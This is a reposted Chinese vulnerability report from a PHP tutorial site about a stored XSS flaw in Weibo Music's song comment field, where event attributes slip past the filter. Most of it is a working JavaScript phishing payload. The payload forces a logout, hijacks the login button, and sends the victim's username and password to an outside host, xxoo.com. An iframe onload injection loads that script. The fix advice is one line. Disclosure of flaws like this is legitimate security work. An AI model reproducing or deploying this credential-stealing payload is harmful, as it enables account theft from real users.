来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] http://music.weibo.com歌曲的歌评处过滤不严,只对script 标签,http 进行了过滤,可通过标签的事件属性进行绕过。为演示xss 的危害,写了个js 脚本进行div 层钓鱼。基本流程是:Js 代码:u...
|
http://music.weibo.com
歌曲的歌评处过滤不严,只对script 标签,http 进行了过滤,可通过标签的事件属性进行绕过。
为演示xss 的危害,写了个js 脚本进行div 层钓鱼。
基本流程是:
 Js 代码:
unction fish () {
if ($("a")[20].innerHTML=="\u9000\u51fa") { //判断是否登陆,若登陆则退出
$.getScript("http://weibo.com/logout.php", function (data) {
location.reload();
});
} else {
$("a")[7].click(); //触发登陆框
setTimeout("getpass()", 500); //劫持登陆按钮
};
};
function getpass () { //劫持登陆按钮
$(".W_btn_g").on("click", function () {
var username = $(".W_input")[0].value; //用户名
var passwd = $(".W_input")[1].value; //密码
$.getScript("http://xxoo.com/weibo_fish.php?username="+username+"&password="+passwd);
window.name = "ok"; //标记window.name ,防止重复
});
};
if (window.name!="ok") {
fish();
};
通过
<iframe style=”display:none” onload=”$.getScript(‘http://xxoo.com/weibo_fish.js’)”></iframe>引入js。 修复方案:
过滤下~ |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
